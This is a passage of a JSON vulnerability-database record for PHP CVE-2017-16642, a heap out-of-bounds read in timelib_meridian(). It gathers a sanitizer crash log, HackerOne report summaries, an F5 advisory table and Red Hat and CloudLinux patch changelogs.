0x36ae0ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x36ae0af0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00[02]\n 0x36ae0b00:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x36ae0b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Heap righ redzone: fb\n Freed Heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n ASan internal: fe\n==13293== ABORTING\nAborted\n\n$ ../php7_wddx/bin/php --version\nPHP 7.1.6 (cli) (built: Jun 27 2017 12:59:32) ( NTS )\nCopyright (c) 1997-2017 The PHP Group\nZend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies\n```\nClassified as a timelib issue, but not sure if can be triggered from other APIs other than wddx_deserialize().", "modified": "2019-10-14T04:38:45", "published": "2017-07-12T10:27:57", "id": "H1:248659", "href": "https://hackerone.com/reports/248659", "type": "hackerone", "title": "PHP (IBB): PHP WDDX Deserialization Heap OOB Read in timelib_meridian()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T18:01:36", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-11145", "CVE-2017-16642"], "description": "Description\nWhile deserializing an invalid dateTime value, wddx_deserialize() would result in a heap out-of-bounds read in timelib_meridian(). As wddx_deserialize() is exposed to network data, and sometimes echo the results back to client, this issue could potentially allow remote peeking of the process memory. It should also affect other PHP APIs that make use of timelib_meridian().\nThis issue is similar to but is a separate issue of CVE-2017-11145, it is related to the \"back of\" and \"front of\" directives in the timelib format.\n\nDetails can be found at: https://bugs.php.net/bug.php?id=75055\n\nImpact\nAffects both PHP 5 before 5.6.32 (ChangeLog http://www.php.net/ChangeLog-5.php#5.6.32) and PHP 7 before 7.1.11 (ChangeLog http://www.php.net/ChangeLog-7.php#7.1.11).\nResolved PHP bug report, will update the pending CVE.\n\n", "modified": "2019-10-14T04:38:08", "published": "2017-10-28T00:16:57", "id": "H1:283644", "href": "https://hackerone.com/reports/283644", "type": "hackerone", "title": "PHP (IBB): Out-Of-Bounds Read in timelib_meridian()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2019-05-23T20:32:12", "bulletinFamily": "software", "cvelist": ["CVE-2017-16642", "CVE-2017-11145"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-11-17T22:18:00", "published": "2017-11-17T22:18:00", "id": "F5:K06420357", "href": "https://support.f5.com/csp/article/K06420357", "title": "PHP vulnerability CVE-2017-16642", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-10162", "CVE-2016-10167", "CVE-2016-10168", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7479", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642", "CVE-2017-5340", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-5711", "CVE-2018-5712"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nThe following packages have been upgraded to a later upstream version: rh-php70-php (7.0.27). (BZ#1518843)\n\nSecurity Fix(es):\n\n* php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field (CVE-2016-7412)\n\n* php: Use after free in wddx_deserialize (CVE-2016-7413)\n\n* php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile (CVE-2016-7414)\n\n* php: Stack based buffer overflow in msgfmt_format_message (CVE-2016-7416)\n\n* php: Missing type check when unserializing SplArray (CVE-2016-7417)\n\n* php: Null pointer dereference in php_wddx_push_element (CVE-2016-7418)\n\n* php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object (CVE-2016-7479)\n\n* php: Invalid read when wddx decodes empty boolean element (CVE-2016-9935)\n\n* php: Use After Free in unserialize() (CVE-2016-9936)\n\n* php: Wrong calculation in exif_convert_any_to_int function (CVE-2016-10158)\n\n* php: Integer overflow in phar_parse_pharfile (CVE-2016-10159)\n\n* php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive (CVE-2016-10160)\n\n* php: Out-of-bounds heap read on unserialize in finish_nested_data() (CVE-2016-10161)\n\n* php: Null pointer dereference when unserializing PHP object (CVE-2016-10162)\n\n* gd: DoS vulnerability in gdImageCreateFromGd2Ctx() (CVE-2016-10167)\n\n* gd: Integer overflow in gd_io.c (CVE-2016-10168)\n\n* php: Use of uninitialized memory in unserialize() (CVE-2017-5340)\n\n* php: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function (CVE-2017-7890)\n\n* oniguruma: Out-of-bounds stack read in match_at() during regular expression searching (CVE-2017-9224)\n\n* oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation (CVE-2017-9226)\n\n* oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching (CVE-2017-9227)\n\n* oniguruma: Out-of-bounds heap write in bitset_set_range() (CVE-2017-9228)\n\n* oniguruma: Invalid pointer dereference in left_adjust_char_head() (CVE-2017-9229)\n\n* php: Incorrect WDDX deserialization of boolean parameters leads to DoS (CVE-2017-11143)\n\n* php: Incorrect return value check of OpenSSL sealing function leads to crash (CVE-2017-11144)\n\n* php: Out-of-bounds read in phar_parse_pharfile (CVE-2017-11147)\n\n* php: Stack-based buffer over-read in msgfmt_parse_message function (CVE-2017-11362)\n\n* php: Stack based 1-byte buffer over-write in zend_ini_do_op() function Zend/zend_ini_parser.c (CVE-2017-11628)\n\n* php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12932)\n\n* php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12934)\n\n* php: reflected XSS in .phar 404 page (CVE-2018-5712)\n\n* php, gd: Stack overflow in gdImageFillToBorder on truecolor images (CVE-2016-9933)\n\n* php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow (CVE-2016-9934)\n\n* php: wddx_deserialize() heap out-of-bound read via php_parse_date() (CVE-2017-11145)\n\n* php: buffer over-read in finish_nested_data function (CVE-2017-12933)\n\n* php: Out-of-bound read in timelib_meridian() (CVE-2017-16642)\n\n* php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c (CVE-2018-5711)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor details, see the Red Hat Software Collections 3.1 Release Notes linked from the References section.", "modified": "2018-06-13T01:28:23", "published": "2018-05-03T07:21:11", "id": "RHSA-2018:1296", "href": "https://access.redhat.com/errata/RHSA-2018:1296", "type": "redhat", "title": "(RHSA-2018:1296) Moderate: rh-php70-php security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudlinux": [{"lastseen": "2021-01-27T22:26:52", "bulletinFamily": "unix", "cvelist": ["CVE-2006-7243", "CVE-2011-4718", "CVE-2014-9653", "CVE-2014-9767", "CVE-2015-0235", "CVE-2015-2331", "CVE-2015-2348", "CVE-2015-3152", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8876", "CVE-2015-8879", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4343", "CVE-2016-4537", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6294", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7478", "CVE-2016-8670", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2018-5712", "CVE-2019-11048", "CVE-2019-13224", "CVE-2019-9023", "CVE-2020-7067", "CVE-2020-7070"], "description": "- Fix bug #69720: Null pointer dereference in phar_get_fp_offset()\n- Fix bug #70728: Type Confusion Vulnerability in PHP_to_XMLRPC_worker()\n- Fix bug #70661: Use After Free Vulnerability in WDDX Packet Deserialization\n- Fix bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability\n- Fix bug #71459: Integer overflow in iptcembed()\n- Fix bug #71039: exec functions ignore length but look for NULL termination\n- Fix bug #71354: Heap corruption in tar/zip/phar parser.\n- Fix bug #71391: NULL Pointer Dereference in phar_tar_setupmetadata()\n- Fix bug #71323: Output of stream_get_meta_data can be falsified by its input\n- Fix bug #71498: Out-of-Bound Read in phar_parse_zipfile()\n- Fix bug #71587: Use-After-Free / Double-Free in WDDX Deserialize\n- Fix bug #71860: Invalid memory write in phar on filename with \\0 in name\n- Fix bug #71798: Integer Overflow in php_raw_url_encode\n- Fix bug #72837: integer overflow in bzdecompress caused heap corruption\n- Fix bug #72681: PHP Session Data Injection Vulnerability\n- Fix bug #72807: integer overflow in curl_escape caused heap corruption\n- Fix bug #72838: Integer overflow lead to heap corruption in sql_regcase\n- Fix bug #72697: select_colors write out-of-bounds\n- Fix bug #72730: imagegammacorrect allows arbitrary write access\n- Fix bug #72836: integer overflow in base64_decode caused heap corruption\n- Fix bug #72848: integer overflow in quoted_printable_encode caused heap corruption\n- Fix bug #72849: integer overflow in urlencode caused heap corruption\n- Fix bug #72850: integer overflow in php_uuencode caused heap corruption\n- Fix bug #72771: ftps:// wrapper is vulnerable to protocol downgrade attack\n- Fix bug #72749: wddx_deserialize allows illegal memory access\n- Fix bug #72750: wddx_deserialize null dereference\n- Fix bug #72790: wddx_deserialize null dereference with invalid xml\n- Fix bug #72799: wddx_deserialize null dereference in php_wddx_pop_element\n- Fix bug #73189: Memcpy negative size parameter php_resolve_path\n- Fix bug #73150: missing NULL check in dom_document_save_html\n- Fix bug #73284: heap overflow in php_ereg_replace function\n- Fix bug #73218: stack-buffer-overflow through "ResourceBundle" methods\n- Fix bug #73208: integer overflow in imap_8bit caused heap corruption\n- Fix bug #73082: string length overflow in mb_encode_* function\n- Fix bug #73174: heap overflow in php_pcre_replace_impl\n- Fix bug #73276: crash in openssl_random_pseudo_bytes function\n- Fix bug #73275: crash in openssl_encrypt function\n- Fix bug #73017: memory corruption in wordwrap function\n- Fix bug #73240: Write out of bounds at number_format\n- Fix bug #73073: CachingIterator null dereference when convert to string\n- Fix bug #73293: NULL pointer dereference in SimpleXMLElement::asXML()\n- Fix bug #73356: crash in bzcompress function\n- Fix bug #72696: imagefilltoborder stackoverflow on truecolor images\n- Fix bug #73418: Integer Overflow in "_php_imap_mail" leads Heap Overflow\n- Fix bug #73144: Use-after-free in ArrayObject Deserialization\n- Fix bug #73192: parse_url return wrong hostname\n- Fix bug #73331: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow\n- Fix bug #73452: Segfault (Regression for #69152)\n- Fix bug #73631: Invalid read when wddx decodes empty boolean element\n- Fix bug #67587: Redirection loop on nginx with FPM\n- Fix bug #71465: PHAR doesn't know about litespeed\n- Fix bug #73737: FPE when parsing a tag format\n- Fix bug #73868: Fix DOS vulnerability in gdImageCreateFromGd2Ctx()\n- Fix bug #73869: Signed Integer Overflow gd_io.c\n- Fix bug #73773: Seg fault when loading hostile phar\n- Fix bug #70436: Use After Free Vulnerability in unserialize()\n- Fix bug #74603: PHP INI Parsing Stack Buffer Overflow Vulnerability\n- Fix bug #72535: arcfour encryption stream filter crashes php\n- Fix bug #72434: ZipArchive class Use After Free Vulnerability in PHP's\n GC algorithm and unseria\n- Fix bug #72455: Heap Overflow due to integer overflows\n- Fix bug #74782: Reflected XSS in .phar 404 page\n- Fix bug #71335: Type Confusion in WDDX Packet Deserialization\n- Fix bug #76130: Heap Buffer Overflow (READ: 1786) in exif_iif_add_value\n- Fix bug #76249: stream filter convert.iconv leads to infinite loop on\n invalid sequence\n- Fix bug #76248: Malicious LDAP-Server Response causes Crash\n- Fix bug #76129: fix for CVE-2018-5712 may not be complete\n- Fix bug #75981: stack-buffer-overflow while parsing HTTP response\n- Fix bug #74385: Locale::parseLocale() broken with some arguments\n- Fix bug #76335: "link(): Bad file descriptor" with non-ASCII path\n- Fix bug #76383: array_map on $GLOBALS returns IS_INDIRECT\n- Fix bug #73342: Vulnerability in php-fpm by changing stdin to non-blocking\n- Fix bug #76505: array_merge_recursive() is duplicating sub-array keys\n- Fix bug #76532: Integer overflow and excessive memory usage in mb_strimwidth\n- Fix bug #76548: pg_fetch_result did not fetch the next row\n- Fix bug #76488: Memory leak when fetching a BLOB field\n- Fix bug #76665: SQLite3Stmt::bindValue() with SQLITE3_FLOAT doesn't juggle\n- Fix bug #75402: Possible Memory Leak using PDO::CURSOR_SCROLL option\n- Fix bug #76517: --with-gettext= causes configure to misjudges there is no getcwd\n- Fix bug #72443: Installing shared extensions: cp: cannot stat 'modules/*':\n No such file or dire\n- Fix bug #68175: RegexIterator pregFlags are NULL instead of 0\n- Fix bug #55146: iconv_mime_decode_headers() skips some headers\n- Fix bug #63839: iconv_mime_decode_headers function is skipping headers\n- Fix bug #60494: iconv_mime_decode does ignore special characters\n- Fix bug #68180: iconv_mime_decode can return extra characters in a header\n- Fix bug #73457: Wrong error message when fopen FTP wrapped fails to open\n data connection\n- Fix bug #74454: Wrong exception being thrown when using ReflectionMethod\n- Fix bug #74764: Bindto IPv6 works with file_get_contents but fails with\n stream_socket_client\n- Fix bug #75273: php_zlib_inflate_filter() may not update bytes_consumed\n- Fix bug #75696: posix_getgrnam fails to print details of group\n- Fix bug #76480: Use curl_multi_wait() so that timeouts are respected\n- Fix bug #76800: foreach inconsistent if array modified during loop\n- Fix bug #76886: Can't build xmlrpc with expat\n- Fix bug #76901: method_exists on SPL iterator passthrough method corrupts memory\n- Fix bug #77242: heap out of bounds read in xmlrpc_decode()\n- Fix bug #77247: heap buffer overflow in phar_detect_phar_fname_ext\n- Fix bug #77270: imagecolormatch Out Of Bounds Write on Heap\n- Fix bug #77370: Buffer overflow on mb regex functions - fetch_token\n- Fix bug #77380: Global out of bounds read in xmlrpc base64 code\n- Fix bug #77630: rename() across the device may allow unwanted access\n during processing\n- Fix bug #77494: Disabling class causes segfault on member access\n- Fix bug #77431: openFile() silently truncates after a null byte\n- Fix bug #51068: DirectoryIterator glob:// don't support current path\n relative queries\n- Fix bug #77396: Null Pointer Dereference in phar_create_or_parse_filename\n- Fix bug #77540: Invalid Read on exif_process_SOFn\n- Fix bug #77390: feof might hang on TLS streams in case of fragmented TLS records\n- Fix bug #77586: phar_tar_writeheaders_int() buffer overflow\n- Fix bug #77546: iptcembed broken function\n- Fix bug #77563: Uninitialized read in exif_process_IFD_in_MAKERNOTE\n- Fix bug #76557: heap-buffer-overflow (READ of size 48) while reading exif data\n- Fix bug #77024: SplFileObject::__toString() may return array\n- Fix bug #77945: Segmentation fault when constructing SoapClient with WSDL_CACHE_BOTH\n- Fix bug #77697: Crash on Big_Endian platform\n- Fix bug #77943: imageantialias($image, false); does not work\n- Fix bug #77944: Wrong meta pdo_type for bigint on LLP64\n- Fix bug #76717: var_export() does not create a parsable value for PHP_INT_MIN\n- Fix bug #77921: static.php.net doesn't work anymore\n- Fix bug #77934: php-fpm kill -USR2 not working\n- Fix bug #77700: Writing truecolor images as GIF ignores interlace flag\n- Fix bug #77765: FTP stream wrapper should set the directory as executable\n- Fix bug #50020: DateInterval:createDateFromString() silently fails\n- Fix bug #77742: bcpow() implementation related to gcc compiler optimization\n- Fix bug #77967: Bypassing open_basedir restrictions via file uris\n- Fix bug #77973: Uninitialized read in gdImageCreateFromXbm\n- Fix bug #77988: heap-buffer-overflow on php_jpg_get16\n- Fix bug #78192: SegFault when reuse statement after schema has changed\n- Fix bug #77124: FTP with SSL memory leak\n- Fix bug #78256: heap-buffer-overflow on exif_process_user_comment\n- Fix bug #78222: heap-buffer-overflow on exif_scan_thumbnail\n- Fix bug #77946: Bad cURL resources returned by curl_multi_info_read()\n- Fix bug #78333: Exif crash (bus error) due to wrong alignment and invalid cast\n- Fix bug #69100: Bus error from stream_copy_to_stream (file -> SSL stream)\n with invalid length\n- Fix bug #76342: file_get_contents waits twice specified timeout\n- Fix bug #76859: stream_get_line skips data if used with data-generating filter\n- Fix bug #78579: mb_decode_numericentity: args number inconsistency\n- Fix bug #78910: Heap-buffer-overflow READ in exif\n- Fix bug #78878: Buffer underflow in bc_shift_addsub\n- Fix bug #78793: Use-after-free in exif parsing under memory sanitizer\n- Fix bug #78863: DirectoryIterator class silently truncates after a null byte\n- Fix bug #79099: OOB read in php_strip_tags_ex\n- Fix bug #79082: Files added to tar with Phar::buildFromIterator have\n all-access permissions\n- Fix bug #79329: get_headers() silently truncates after a null byte\n- Fix bug #79282: Use-of-uninitialized-value in exif\n- Fix bug #61597: SimpleXMLElement doesn't include both @attributes and\n textContent in properties\n- Fix bug #74940: DateTimeZone loose comparison always true until properties\n are initialized.\n- Fix bug #79296: ZipArchive::open fails on empty file (libzip 1.6.0)\n- Fix bug #79330: shell_exec() silently truncates after a null byte\n- Fix bug #79364: When copy empty array, next key is unspecified.\n- Fix bug #79396: DateTime hour incorrect during DST jump forward using setTime\n- Fix bug #79410: system() swallows last chunk if it is exactly 4095 bytes\n without newline\n- Fix bug #79424: php_zip_glob uses gl_pathc after call to globfree\n- Fix bug #79465: OOB Read in urldecode() (CVE-2020-7067)\n- Fix bug #78221: DOMNode::normalize() doesn't remove empty text nodes\n- Fix bug #78875: Long filenames cause OOM and temp files are not cleaned\n (CVE-2019-11048)\n- Fix bug #78876: Long variables in multipart/form-data cause OOM and temp\n files are not cleaned (CVE-2019-11048)\n- Fix bug #79514: Memory leaks while including unexistent file\n- Fix bug #79528: Different object of the same xml between 7.4.5 and 7.4.4\n- Fix bug #62890: default_socket_timeout=-1 causes connection to timeout\n- Fix bug #70362: Can't copy() large 'data://' with open_basedir\n- Fix bug #73527: Invalid memory access in php_filter_strip\n- Fix bug #74267: segfault with streams and invalid data\n- Fix bug #79787: mb_strimwidth does not trim string\n- Fix bug #79877: getimagesize function silently truncates after a null byte\n- Fix bug #68447: grapheme_extract take an extra trailing character\n- Fix bug #68825: Inconsistent exception in DirectoryIterator::getLinkTarget()\n- Fix bug #74145: wddx parsing empty boolean tag leads to SIGSEGV (CVE-2017-11143)\n- Fix bug #74651: negative-size-param (-1) in memcpy in zif_openssl_seal()\n (CVE-2017-11144)\n- Fix bug #74435: Buffer over-read into uninitialized memory (CVE-2017-7890)\n- Fix bug #73093: Unserialize Exception object can lead to infinite loop\n (CVE-2016-7478)\n- Fix bug #72520: Stack-based buffer overflow vulnerability in php_stream_zip_opener\n (CVE-2016-6297)\n- Fix bug #73825: Heap out of bounds read on unserialize in finish_nested_data()\n (CVE-2016-10161)\n- Fix bug #60491: Session module is adoptive (CVE-2011-4718)\n- Fix bug #69253: ZIP Integer Overflow leads to writing past heap boundary\n (CVE-2015-2331)\n- Fix bug #69418: CVE-2006-7243 fix regressions in 5.4+ (CVE-2015-4025)\n- Fix bug #68598: pcntl_exec() should not allow null char (CVE-2015-4026)\n- Fix bug #69207: move_uploaded_file allows nulls in path (CVE-2015-2348)\n- Fix bug #69218: potential remote code execution with apache 2.4 apache2handler\n (CVE-2015-3330)\n- Fix bug #69719: Incorrect handling of paths with NULs, related to bug 69353\n (CVE-2015-4598)\n- Fix bug #69353: Missing null byte checks for paths in various PHP extensions\n (CVE-2015-3411)\n- Fix bugs #70168, #70169, #70166, #70155: Use After Free Vulnerability in\n unserialize() with\n SplObjectStorage, SplDoublyLinkedList, SPLArrayObject, SPLArrayObject (CVE-2015-6831)\n- Fix bug #70019: Files extracted from archive may be placed outside of\n destination directory (CVE-2015-6833)\n- Fix bug #70388: SOAP serialize_function_call() type confusion / RCE (CVE-2015-6836)\n- Fix bug #69782: NULL pointer dereference (CVE-2015-6837, CVE-2015-6838)\n- Fix bug #70433: Uninitialized pointer in phar_make_dirstream when zip entry\n filename is \"/\" (CVE-2015-7804)\n- Fix bug #69923: Buffer overflow and stack smashing error in phar_fix_filepath\n (CVE-2015-5590)\n- Fix bug #71488: Stack overflow when decompressing tar archives (CVE-2016-2554)\n- Fix bug #72061: Out-of-bounds reads in zif_grapheme_stripos with negative offset\n (CVE-2016-4541, CVE-2016-4540)\n- Fix bug #72094: Out of bounds heap read access in exif header processing\n (CVE-2016-4542)\n- Fix bug #72093: bcpowmod accepts negative scale and corrupts _one_ definition\n (CVE-2016-4537)\n- Fix bug #71331: Uninitialized pointer in phar_make_dirstream() (CVE-2016-4343)\n- Fix bug #72241: get_icu_value_internal out-of-bounds read (CVE-2016-5093)\n- Fix bug #72135: Integer Overflow in php_html_entities() (CVE-2016-5094)\n- Fix bug #72114: Integer underflow / arbitrary null write in fread/gzread\n (CVE-2016-5096)\n- Fix bug #72339: Integer Overflow in _gd2GetHeader() resulting in heap overflow\n (CVE-2016-5766)\n- Fix bug #72340: Double Free Courruption in wddx_deserialize (CVE-2016-5772)\n- Fix bug #72613: Inadequate error handling in bzread() (CVE-2016-5399)\n- Fix bug #70480: php_url_parse_ex() buffer overflow read (CVE-2016-6288)\n- Fix bug #72513: Stack-based buffer overflow vulnerability in virtual_file_ex\n (CVE-2016-6289)\n- Fix bug #72562: Use After Free in unserialize() with Unexpected Session\n Deserialization (CVE-2016-6290)\n- Fix bug #72603: Out of bound read in exif_process_IFD_in_MAKERNOTE (CVE-2016-6291)\n- Fix bug #72533: locale_accept_from_http out-of-bounds access (CVE-2016-6294)\n- Fix bug #69975: PHP segfaults when accessing nvarchar(max) defined columns\n (CVE-2015-8879)\n- Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c\n (CVE-2016-6296)\n- Fix bug #72293: Heap overflow in mysqlnd related to BIT fields (CVE-2016-7412)\n- Fix bug #72860: wddx_deserialize use-after-free (CVE-2016-7413)\n- Fix bug #72928: Out of bound when verify signature of zip phar in phar_parse_zipfile\n (CVE-2016-7414)\n- Fix bug #73007: SEH buffer overflow msgfmt_format_message (CVE-2016-7416)\n- Fix bug #73029: Missing type check when unserializing SplArray (CVE-2016-7417)\n- Fix bug #73065: Out-Of-Bounds Read in php_wddx_push_element of wddx.c (CVE-2016-7418)\n- Fix bug #73280: Stack Buffer Overflow in GD dynamicGetbuf (CVE-2016-8670)\n- Fix bug #73764: Crash while loading hostile phar archive (CVE-2016-10159)\n- Fix bug #73768: Memory corruption when loading hostile phar (CVE-2016-10160)\n- Fix bug #72627: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)\n- Fix bug #70350: ZipArchive::extractTo allows for directory traversal when\n creating directories (CVE-2014-9767)\n- Fix bug #70081: SoapClient info leak / null pointer dereference via multiple\n type confusions (CVE-2015-8835)\n- Fix bug #70121: unserialize() could lead to unexpected methods execution / NULL\n pointer deref (CVE-2015-8876)\n- Fix bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut\n (CVE-2016-4073)\n- Fix bug #70014: openssl_random_pseudo_bytes() is not cryptographically secure\n (CVE-2015-8867)\n- Fix bug #77371: heap buffer overflow in mb regex functions - compile_string_node\n (CVE-2019-9023)\n- Fix bug #77381: heap buffer overflow in multibyte match_at (CVE-2019-9023)\n- Fix bug #77382: heap buffer overflow due to incorrect length in expand_case_fold_string\n (CVE-2019-9023)\n- Fix bug #77385: buffer overflow in fetch_token (CVE-2019-9023)\n- Fix bug #77394: Buffer overflow in multibyte case folding - unicode (CVE-2019-9023)\n- Fix vulnerabilities with oniguruma: CVE-2017-9226, CVE-2017-9224, CVE-2017-9227,\n CVE-2017-9228, CVE-2019-13224\n- Fix general vulneravilities: CVE-2014-9653, CVE-2015-0235, CVE-2015-3152,\n CVE-2016-3074\n- Fix bug #79699: PHP parses encoded cookie names so malicious `__Host-` cookies\n can be sent (CVE-2020-7070)\n- Fix bug #80007: Potential type confusion in unixtojd() parameter parsing", "modified": "2020-10-15T12:00:00", "published": "2020-10-15T12:00:00", "id": "CLSA-2020:1605798462", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "type": "cloudlinux", "title": "Fix of 227 CVE", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}